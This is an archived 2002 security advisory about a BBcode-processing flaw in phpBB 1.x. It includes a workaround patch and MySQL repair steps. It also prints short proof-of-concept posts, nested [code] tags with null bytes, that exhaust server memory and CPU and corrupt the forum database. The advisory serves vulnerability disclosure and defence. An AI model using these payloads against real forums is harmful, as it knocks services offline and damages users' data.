(WSS-Advisories-02003) PHPBB BBcode Process Vulnerability

From: Whitecell Security Systems (security@whitecell.org)
Date: 04/04/02


Date: Thu, 4 Apr 2002 21:23:40 +0800
From: Whitecell Security Systems <security@whitecell.org>
To: bugtraq@securityfocus.com <bugtraq@securityfocus.com>, vuln-dev@securityfocus.com <vuln-dev@securityfocus.com>


(WSS-Advisories-02003) PHPBB BBcode Process Vulnerability


Release infomation
------------------

Release Date: 2001-4-4
Author: By Whitecell Security Systems(WSS)
          tombkeeper (tombkeeper@whitecell.org)
              alert7 (alert7@whitecell.org)
Homepage: http://www.whitecell.org/


Impact:
--------

WSS has found a vulnerability in PHPBB when PHPBB process BBcode,which could
enbale one user D.O.S system and destroy PHPBB databases.


Affected Versions
--------------------

        phpBB Group phpBB 1.4.4
        phpBB Group phpBB 1.4.2
        phpBB Group phpBB 1.4.1
        phpBB Group phpBB 1.4.0
        phpBB Group phpBB 1.2.1
        phpBB Group phpBB 1.2.0
        phpBB Group phpBB 1.0.0
----------------------------

NOT TEST:
phpBB Group phpBB 2.x


Description:
------------

  phpbb support nesting BBcode [code][/code],[quote][/quote],[list][/list].
Unfortunately,there is a mistake when process BBcode in functions.php .


Exploit:
----------

Ò»£º
submit the following poster:

[code]
\0\0\0\0\0\0\0
[/code]

In fact, the following data have saved to database after BBcode process.

[1code]
\0\0\0\0\0\0\0
[/code1][1code]
\0\0\0\0\0\0\0
[/code1][1code]
\0\0\0\0\0\0\0
[/code1][1code]
\0\0\0\0\0\0\0
[/code1][1code]
\0\0\0\0\0\0\0
[/code1][1code]
\0\0\0\0\0\0\0
[/code1][1code]
\0\0\0\0\0\0\0
[/code1]

¶þ£º
submit the following poster:
[code]'\0'*800[/code]

see system
whitecell$ top
PID USER PRI NI SIZE RSS SHARE STAT TIME COMMAND
8643 nobody 13 0 212M 81M 13604 D 8.0 65.7 0:07 httpd

phpbb error message:
Could not enter post text!

but in fact ,Two data have alreay saved to databases.Now, the database
is uncompleted.If you brower the forum to see which you post,phpbb could
report message:"Could not connect to the forums database."

Èý£º
submit 49 bytes data:

[code]\0[code]\0[code]\0[/code]\0[/code]\0[/code]

type top to see cpu:
  PID USER PRI NI SIZE RSS SHARE STAT TIME COMMAND
25741 nobody 14 0 11828 9996 416 R 99.9 7.8 2:38 httpd

Experiment environment£ºlinux 2.4.10 Apache/1.3.23 PHP 4.1.2


Vendor
--------

http://www.phpbb.com


Workaround:
-----------

1:disale BBcode until Vendor fixed.
2:modify functions.php bbencode_code()

function bbencode_code($message, $is_html_disabled)
{
        $message = preg_replace("/\[code\](.*?)\[\/code\]/si", "<!-- BBCode Start --><TABLE BORDER=0 ALIGN=CENTER WIDTH=85><TR><TD><font size=-1>Code:</font><HR></TD></TR><TR><TD><FONT SIZE=-1><PRE>\\1</PRE></FONT></TD></TR><TR><TD><HR></TD></TR></TABLE><!-- BBCode End -->", $message);
        return $message;

} // bbencode_code()

REPAIR DATABASE:
if url is http://host/forums/viewtopic.php?topic=1162&forum=1&0
you can use the following command to repair it :
whitecell$ mysql -uuser -ppasswd
mysql> use databasename;
mysql> select * from topics where topic_id = 1162; //GET post_id
mysql> delete from posts where post_id = 6280;
mysql> delete from posts_text where post_id = 6280;
mysql> delete from topics where topic_id = 1162;


ABOUT WSS£º
------------

WSS is a non-profit and free technology organization . We are devoting to
research and demonstration of weaknesses related to network services ,
communication security and system security.


Copyright 2002 http://www.whitecell.org/ All rights reserved.



Relevant Pages

  • Re: MySQL 4.x questions...
    ... Both users groups tell me that there's a mysql ... > phpBB: Critical Error ... > Could not connect to the database ... (see the app documentation for the correct database name to use) ...
    (freebsd-questions)
  • [UNIX] PHPBB BBcode Process Vulnerability (DoS)
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... WSS has found a vulnerability in <http://www.phpbb.com/> phpBB, ... Will cause the following data to be saved to the database: ... whitecell$ mysql -uuser -ppasswd ...
    (Securiteam)
  • (WSS-Advisories-02003) PHPBB BBcode Process Vulnerability
    ... PHPBB BBcode Process Vulnerability ... the following data have saved to database after BBcode process. ... whitecell$ mysql -uuser -ppasswd ...
    (Vuln-Dev)
  • (WSS-Advisories-02003) PHPBB BBcode Process Vulnerability
    ... PHPBB BBcode Process Vulnerability ... the following data have saved to database after BBcode process. ... whitecell$ mysql -uuser -ppasswd ...
    (Bugtraq)
  • Re: CAPTCHA email images
    ... scene - something he needs because he "combats" spam. ... marketing people would love such a database. ... would you use your usenet persona email address? ... Suppose you're on a PHPBB and you post as cuddly, ...
    (sci.crypt)